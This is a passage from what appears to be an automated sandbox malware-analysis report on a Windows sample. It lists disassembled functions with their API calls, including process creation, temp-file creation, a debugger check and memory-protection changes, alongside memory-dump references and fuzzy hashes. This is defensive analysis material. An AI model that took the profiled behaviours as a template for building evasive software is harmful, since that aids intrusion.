                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID: bad allocation
                                          • API String ID: 3902256705-2104205924
                                          • Opcode ID: 2325750f4f623ddb5c55ad8711012faf8eb7dce2d2aea2da26c6456520d70dc0
                                          • Instruction ID: 0c9b6a824f78b84f4b42cc0837c603ab27e198cbcb6ae3ad06fbb246775a3663
                                          • Opcode Fuzzy Hash: 2325750f4f623ddb5c55ad8711012faf8eb7dce2d2aea2da26c6456520d70dc0
                                          • Instruction Fuzzy Hash: 5DF0F93554020DB6CB20BA54EC029FF77A8DF00391F118015FB04A2141DFB08A8096B1
                                          Function 01153C68 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01153CAD
                                          • ExitProcess.KERNEL32(00000000), ref: 01153CCC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process$CreateExit
                                          • String ID: D
                                          • API String ID: 126409537-2746444292
                                          • Opcode ID: 9f0fea074abf0f39dd8420fc00d89007b68beb3d91da31db31286a021e466f34
                                          • Instruction ID: 5ab27edc308e11d43142687723f0ad06506fd7e7267649182d82997f997ec8f7
                                          • Opcode Fuzzy Hash: 9f0fea074abf0f39dd8420fc00d89007b68beb3d91da31db31286a021e466f34
                                          • Instruction Fuzzy Hash: EAF0ECB154024CEBDBA4EFE0CC49FEE7779BF04701F408509FA2A9A180DB7496088B61
                                          Function 00E39B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00E39B82
                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E39B99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: 8714c7e66474a4f50db06aa8f08569a9a74cd7b5c24dd171b653bd54813afa93
                                          • Instruction ID: efd47eff8e6e670035dc8236a0b6f5ee92e0c18ad8a20fd623344bcc8764f602
                                          • Opcode Fuzzy Hash: 8714c7e66474a4f50db06aa8f08569a9a74cd7b5c24dd171b653bd54813afa93
                                          • Instruction Fuzzy Hash: 3DD05EB954030DAFDF10AB90DC0EF9A772CE704702F0046B1FE68A60A1EEB055988B92
                                          Function 00E4CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71927cda7c4debd2c32b9a0ed17853d3205ca28151706236da4c51bae8109f64
                                          • Instruction ID: 32426d38ee1f3f822293fefd24f4f2925b2e798be110ead193f5eb042b4561f3
                                          • Opcode Fuzzy Hash: 71927cda7c4debd2c32b9a0ed17853d3205ca28151706236da4c51bae8109f64
                                          • Instruction Fuzzy Hash: E8F16971A083019FC714DF28D880A6ABBE5FF88314F14992EF899AB351D771E945CF92
                                          Function 00DD43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00DD4401
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DD44A6
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DD44C3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$_memset
                                          • String ID:
                                          • API String ID: 1505330794-0
                                          • Opcode ID: 5df90563f4a3c710213f68d94f7b1d536acab32b0eb9a9537c5143f4bae7ec1d
                                          • Instruction ID: a8b2510cd069e6d87307463aab886b9ef53942d6458fe7e6ca8725e6a70db173
                                          • Opcode Fuzzy Hash: 5df90563f4a3c710213f68d94f7b1d536acab32b0eb9a9537c5143f4bae7ec1d
                                          • Instruction Fuzzy Hash: 1E315EB05047019FD760DF65D88469BBBE8FB48308F04092FF59A93391D7B5A988CBA2
                                          Function 00DF594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 00DF5963
                                            • Part of subcall function 00DFA3AB: __NMSG_WRITE.LIBCMT ref: 00DFA3D2
                                            • Part of subcall function 00DFA3AB: __NMSG_WRITE.LIBCMT ref: 00DFA3DC
                                          • __NMSG_WRITE.LIBCMT ref: 00DF596A
                                            • Part of subcall function 00DFA408: GetModuleFileNameW.KERNEL32(00000000,00E943BA,00000104,00000000,00000001,00000000), ref: 00DFA49A
                                            • Part of subcall function 00DFA408: ___crtMessageBoxW.LIBCMT ref: 00DFA548
                                            • Part of subcall function 00DF32DF: ___crtCorExitProcess.LIBCMT ref: 00DF32E5
                                            • Part of subcall function 00DF32DF: ExitProcess.KERNEL32 ref: 00DF32EE
                                            • Part of subcall function 00DF8D68: __getptd_noexit.LIBCMT ref: 00DF8D68
                                          • RtlAllocateHeap.NTDLL(00F60000,00000000,00000001), ref: 00DF598F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: dff0a850a79836edb8379a259e3a895b07acb43cbc0ac8493221b520bfb23d9c
                                          • Instruction ID: 2ac14246239511b1c3917a65a1b2544f0d9a7821cd913f63e09b988c4be72a5e
                                          • Opcode Fuzzy Hash: dff0a850a79836edb8379a259e3a895b07acb43cbc0ac8493221b520bfb23d9c
                                          • Instruction Fuzzy Hash: 7A01C471301B1EDED6296765EC41A3D7288DF41731F57C02AF705AA1D1DAB09D014A71
                                          Function 00E39B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00E397D2,?,?,?,?,?,00000004), ref: 00E39B45
                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E397D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E39B5B
                                          • CloseHandle.KERNEL32(00000000,?,00E397D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E39B62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: 6226584a544f1283ed008f18720e2e8beeef006db708db771f0a85131ded208b
                                          • Instruction ID: 08dc9f30d92a6401d096c6242c1ae64942f1e9d81a179f232926ef61ca1cc134
                                          • Opcode Fuzzy Hash: 6226584a544f1283ed008f18720e2e8beeef006db708db771f0a85131ded208b
                                          • Instruction Fuzzy Hash: 0DE08632181714BBE7212B55EC09FCA7F18AB05766F104620FB54B90E187B125159798
                                          Function 00E38F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00E38FA5
                                            • Part of subcall function 00DF2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00DF9C64), ref: 00DF2FA9
                                            • Part of subcall function 00DF2F95: GetLastError.KERNEL32(00000000,?,00DF9C64), ref: 00DF2FBB
                                          • _free.LIBCMT ref: 00E38FB6
                                          • _free.LIBCMT ref: 00E38FC8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                          • Instruction ID: 022441c661219bea9b9f4b16758775f89850a9bd46d35f93c25b70f914d61831
                                          • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                          • Instruction Fuzzy Hash: 40E012B17197094ACA24A579AE44AB36BFE9F48358B19181DB509EB142DE24E841C534
                                          Function 00DDAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: 01f8a560978e348396e6adf6d7e9231569971452d34ee891f2bcded552c5d3f5
                                          • Instruction ID: e5d6dba61919d81e0c27ef39c10ed78f092fdaf5add2bdc2215680229ba605c7
                                          • Opcode Fuzzy Hash: 01f8a560978e348396e6adf6d7e9231569971452d34ee891f2bcded552c5d3f5
                                          • Instruction Fuzzy Hash: D8226774608341DFC724DF18C490A6ABBE1FF84304F19895EE8969B362D771ED85CBA2
                                          Function 00DD7BB1 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 144f4f6f86792f63c0b12f950643615dc0b10619876d46ecf705f140cfd4c05b
                                          • Instruction ID: 301d0248d2f89123d9bf7d6aa1f70b15d8f3a564f6e631b60852c896f8725f82
                                          • Opcode Fuzzy Hash: 144f4f6f86792f63c0b12f950643615dc0b10619876d46ecf705f140cfd4c05b
                                          • Instruction Fuzzy Hash: 8C31C5B1614506AFC714DF2CD8D1E69F7A9FF48320719866AE915CB391EB70E860CBB0
                                          Function 00DD492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • 745AC8D0.UXTHEME ref: 00DD4992
                                            • Part of subcall function 00DF35AC: __lock.LIBCMT ref: 00DF35B2
                                            • Part of subcall function 00DF35AC: RtlDecodePointer.NTDLL(00000001), ref: 00DF35BE
                                            • Part of subcall function 00DF35AC: RtlEncodePointer.NTDLL(?), ref: 00DF35C9
                                            • Part of subcall function 00DD4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DD4A73
                                            • Part of subcall function 00DD4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DD4A88
                                            • Part of subcall function 00DD3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DD3B7A
                                            • Part of subcall function 00DD3B4C: IsDebuggerPresent.KERNEL32 ref: 00DD3B8C
                                            • Part of subcall function 00DD3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00E962F8,00E962E0,?,?), ref: 00DD3BFD
                                            • Part of subcall function 00DD3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00DD3C81
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DD49D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                          • String ID:
                                          • API String ID: 2688871447-0
                                          • Opcode ID: f3c9fab7af645dc3aba73b234e11d59407c866f89da2d8729e2fbb5d71a8cdd9
                                          • Instruction ID: ede8016c0069b7adddfb586fbdb20e693e612daa81b7156382356e6f1db2509e
                                          • Opcode Fuzzy Hash: f3c9fab7af645dc3aba73b234e11d59407c866f89da2d8729e2fbb5d71a8cdd9
                                          • Instruction Fuzzy Hash: 2B118C719183119FC700EF2AEC0591AFBE8EF98710F00891FF095A72B1DB709549CBA6
                                          Function 00DF582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __lock_file_memset
                                          • String ID:
                                          • API String ID: 26237723-0
                                          • Opcode ID: ed441a6d92008842dea5bdc3b26d98b36fea0a0b1625b37337842eaad078e7fc
                                          • Instruction ID: 6ba8def2389d91f9f7c97fab3b40bf0fe0c7b067b58a2eab134a71e10abd603b
                                          • Opcode Fuzzy Hash: ed441a6d92008842dea5bdc3b26d98b36fea0a0b1625b37337842eaad078e7fc
                                          • Instruction Fuzzy Hash: AF014871800A0DEBCF11AF65EC055BE7B61EF403A0F16C215BB145B165DB31CA11EBB1
                                          Function 00DF55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF8D68: __getptd_noexit.LIBCMT ref: 00DF8D68
                                          • __lock_file.LIBCMT ref: 00DF561B
                                            • Part of subcall function 00DF6E4E: __lock.LIBCMT ref: 00DF6E71
                                          • __fclose_nolock.LIBCMT ref: 00DF5626
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: 7c6f07d8ff8966316cbb4ac5715920636f054d3f3a7d06ca7dc09238152e8b0b
                                          • Instruction ID: a3f3433c77c0a279a2819bc21ec858ecb9935d3eac5c590c8ab15c1ce639fb40
                                          • Opcode Fuzzy Hash: 7c6f07d8ff8966316cbb4ac5715920636f054d3f3a7d06ca7dc09238152e8b0b
                                          • Instruction Fuzzy Hash: 73F09071900A0C9ADB20AF75980277E66A1AF41734F5BC209A765EB1C5CF7C8A01AB76
                                          Function 01153CD8 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 01153548: GetFileAttributesW.KERNELBASE(?), ref: 01153553
                                          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01153E46
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AttributesCreateDirectoryFile
                                          • String ID:
                                          • API String ID: 3401506121-0
                                          • Opcode ID: 294bc51bcb7836b97e0e388d4f52f4c04879332621c9e9dd0a26e77aae89c287
                                          • Instruction ID: e5680689c383b28e196b05e82e501648a07938dc66cdbe1a92be6cb8f072f9de
                                          • Opcode Fuzzy Hash: 294bc51bcb7836b97e0e388d4f52f4c04879332621c9e9dd0a26e77aae89c287
                                          • Instruction Fuzzy Hash: D0616031A20208E6EF14DFA4D844BEEB33AFF58740F00456DEA19E7290EB759A45C766
                                          Function 00DF0E48 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: e5bf7962aa66127db4eb147453ae5af21750a525cbb13ec7a2315181d394968e
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: FE31E470A00109DFC718DF58C480969FBA6FF59300B6ACAA5E94ACB652D731EDC1CBE0
                                          Function 00E100D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: ad4ed14ae86a41a47257f78b12f6842e2ae15a18683067bc91434df530705fd6
                                          • Instruction ID: 98a9450a9fa30ce825a19bde71311c01a2eb0f466f2ece59667204acb9414c3b
                                          • Opcode Fuzzy Hash: ad4ed14ae86a41a47257f78b12f6842e2ae15a18683067bc91434df530705fd6
                                          • Instruction Fuzzy Hash: FD413874604341DFDB24DF18C484B1ABBE1BF45318F09889DE9995B362C776EC85CB62
                                          Function 00DD4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                          Download Yara Rule
